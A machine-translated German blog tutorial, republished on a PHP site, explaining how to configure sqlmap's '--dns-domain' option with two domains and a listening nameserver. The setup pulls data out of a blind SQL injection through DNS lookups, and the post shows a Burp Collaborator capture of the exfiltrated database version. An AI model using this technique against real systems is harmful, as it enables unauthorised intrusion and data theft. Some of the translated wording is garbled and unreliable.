Heim > Betrieb und Instandhaltung > Sicherheit > Was ist die sqlmap _dns-Injection-Konfigurationsmethode?

Was ist die sqlmap _dns-Injection-Konfigurationsmethode?

WBOY
Freigeben: 2023-05-12 12:25:06
nach vorne
1437 Leute haben es durchsucht

Es gibt zu wenige verwandte Artikel zu SQLmap für die DNS-Injektion. Sie stellen den Parameter --dns-domain nur kurz vor oder erwähnen ihn auf einen Schlag, was verwirrend ist (hauptsächlich unehrlich, der Schlüssel). ist immer noch Es gibt keinen Chef, der es bringt). Dann habe ich es noch einmal gemacht, indem ich auf die Methoden im Internet verwiesen habe.

Dinge, die vorbereitet werden müssen, sind SQLMap, Windows Blind Injection, ein oder zwei Domänennamen und ein externer Netzwerkserver.

sqlmap _dns注入配置方法是什么

Irgendwann, als ich etwas tat, stieß ich auf eine zeitblinde Injektion. Es war zufällig eine Windows-Maschine, und ich erinnerte mich an die Methode der DNS-Injektion.

sqlmap _dns注入配置方法是什么

Bevor ich anfange, habe ich vor, den Befehl --sql-shell von sqlmap zu verwenden, um die DNS-Injection-Nutzlast zu testen

sqlmap _dns注入配置方法是什么

Kopieren Sie zunächst den von burp für uns arrangierten Domänennamen im Collaborator-Client in burpsuite

Verwenden sqlmap zum Ausführen von SQL-Anweisungen

sqlmap _dns注入配置方法是什么

Die Anfrage wurde in burpsuite empfangen, während Sqlmap noch ausgeführt wird.

sqlmap _dns注入配置方法是什么

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

Der 352E362E3134 in ist das Ergebnis, das nach der Ausführung von version() zurückgegeben wird.

sqlmap _dns注入配置方法是什么

Dekodieren Sie, um die MySQL-Version zu erhalten. Nun, an der DNS-Injektion ist derzeit nichts auszusetzen.

Bereiten Sie sich darauf vor, zwei Domänennamen zu konfigurieren. In einigen Artikeln im Internet heißt es, dass einer in Ordnung ist, aber es fühlt sich immer problematischer an. Viele Anbieter von Domänennamenservern bieten bestimmte erweiterte Funktionen nicht an, sodass es einfacher ist, zwei vorzubereiten.

www.a.com

www.b.com

Zuerst konfigurieren wir den Domainnamen a-> Netzwerkserver.

Jetzt konfigurieren wir unseren Domainnamen b->b.comsqlmap _dns注入配置方法是什么

Das ist noch einfacher. Ändern Sie einfach die DNS des Domainnamens, geben Sie einfach ns1.a.com, ns2.a.com und alles ein Sonst ist es in Ordnung, es nicht zu tun, füllen Sie es einfach aus.

Dann warten Sie, bis der Domainname wirksam wird. Wir gehen zum externen Netzwerkserver, um zu testen, ob die Analyse erfolgreich ist. Der Server beginnt, den Port 53 abzuhören. Dann sendet der lokale Computer einen Ping an den externen Netzwerkserver Ich kann bereits eine Hallo-B.com-Anfrage erhalten und der Computer meldet, dass der Host nicht gefunden werden kann. Machen Sie sich keine Sorgen, da wir die Analyse nicht eingerichtet haben. Nachdem nun alles konfiguriert ist, können wir sqlmap für die DNS-Injektion verwenden. sqlmap _dns注入配置方法是什么

Fügen Sie den Parameter --dns-domain=b.com --hex zu Sqlmap hinzu und Sie können

sqlmap _dns注入配置方法是什么

Bei diesem Schritt bleibt sqlmap hängen und fordert Sie auf, die DNS-Serverinstanz einzurichten

Direkt Strg+Csqlmap _dns注入配置方法是什么

Melden Sie, dass der Datenabruf über den DNS-Kanal erfolgreich war. sqlmap _dns注入配置方法是什么

Die Injektionsgeschwindigkeit ist so hoch wie die Fehlerberichterstattung und Vereinigung, es besteht keine Notwendigkeit mehr, langsame Geschwindigkeiten zu ertragen.

Das obige ist der detaillierte Inhalt vonWas ist die sqlmap _dns-Injection-Konfigurationsmethode?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:yisu.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage